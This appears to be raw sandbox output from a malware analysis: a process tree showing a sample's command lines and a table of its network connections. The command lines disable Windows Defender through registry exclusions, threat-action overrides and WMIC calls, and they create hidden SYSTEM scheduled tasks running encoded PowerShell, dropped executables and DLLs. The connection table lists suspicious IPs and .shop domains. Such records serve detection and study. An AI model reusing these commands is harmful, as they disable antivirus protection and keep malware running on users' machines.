"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gScElhCXk" /SC once /ST 14:42:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gScElhCXk"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gScElhCXk"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 02:45:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe\" aV /krrPdidFa 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "yfARWRprRqUFWeTGf"

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe aV /krrPdidFa 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\SpabVJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\BmSHugr.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "JHJXtPPPvDXVqpH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\xnYLPJK.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\FcEDCAl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\FbvFsjn.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\hSfCpaE.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 11:38:12 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\UnHcoahb\dsyiljV.dll\",#1 /LoodidPklZ 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aNyMQclguOCSCcjxm"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\UnHcoahb\dsyiljV.dll",#1 /LoodidPklZ 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\UnHcoahb\dsyiljV.dll",#1 /LoodidPklZ 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aNyMQclguOCSCcjxm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yfARWRprRqUFWeTGf"

C:\Users\Admin\Pictures\pii7D8Eu2OpnTZhxUVxzTrTz.exe

"C:\Users\Admin\Pictures\pii7D8Eu2OpnTZhxUVxzTrTz.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe

C:\Windows\SYSTEM32\msiexec.exe

"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\Pictures\sClcuRUxjnTR7jrczebXP6s3.exe

"C:\Users\Admin\Pictures\sClcuRUxjnTR7jrczebXP6s3.exe"

C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe

.\Install.exe /WkfdidVYT "385118" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 4B1C35593368ADF9107E559B541790F4

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 807D18711548947963DE007F0F991CD2 E Global\MSI0000

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 15:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe\" Wt /kQedidCheI 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn biPxHmULFllsbMgnpt

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn biPxHmULFllsbMgnpt

C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe Wt /kQedidCheI 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5404 -ip 5404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 1336

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
RU 193.233.132.139:80 193.233.132.139 tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 139.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 167.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
GB 216.58.213.14:443 www.youtube.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 173.194.69.84:443 accounts.google.com tcp
NL 173.194.69.84:443 accounts.google.com udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 84.69.194.173.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.179.234:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
GB 172.217.16.238:443 accounts.youtube.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.178.4:443 www.google.com udp
GB 142.250.178.4:443 www.google.com tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 4.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.16.238:443 clients2.google.com udp
GB 172.217.16.238:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 affordcharmcropwo.shop udp
US 104.21.67.211:443 affordcharmcropwo.shop tcp
US 8.8.8.8:53 cleartotalfisherwo.shop udp
US 172.67.185.32:443 cleartotalfisherwo.shop tcp
US 8.8.8.8:53 worryfillvolcawoi.shop udp
US 104.21.44.125:443 worryfillvolcawoi.shop tcp
US 8.8.8.8:53 enthusiasimtitleow.shop udp
US 188.114.96.2:443 enthusiasimtitleow.shop tcp
US 8.8.8.8:53 211.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 32.185.67.172.in-addr.arpa udp
US 8.8.8.8:53 125.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 dismissalcylinderhostw.shop udp
US 104.21.22.160:443 dismissalcylinderhostw.shop tcp
US 8.8.8.8:53 diskretainvigorousiw.shop udp
US 104.21.23.143:443 diskretainvigorousiw.shop tcp
US 8.8.8.8:53 communicationgenerwo.shop udp
US 172.67.166.251:443 communicationgenerwo.shop tcp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 160.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 143.23.21.104.in-addr.arpa udp
US 8.8.8.8:53 pillowbrocccolipe.shop udp
US 104.21.47.56:443 pillowbrocccolipe.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 251.166.67.172.in-addr.arpa udp
US 8.8.8.8:53 56.47.21.104.in-addr.arpa udp
US 8.8.8.8:53 productivelookewr.shop udp
US 104.21.11.250:443 productivelookewr.shop tcp
US 8.8.8.8:53 tolerateilusidjukl.shop udp
US 172.67.147.41:443 tolerateilusidjukl.shop tcp
DE 185.172.128.33:8970 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.187.206:443 play.google.com tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 250.11.21.104.in-addr.arpa udp
US 8.8.8.8:53 41.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 shatterbreathepsw.shop udp
GB 142.250.187.206:443 play.google.com udp
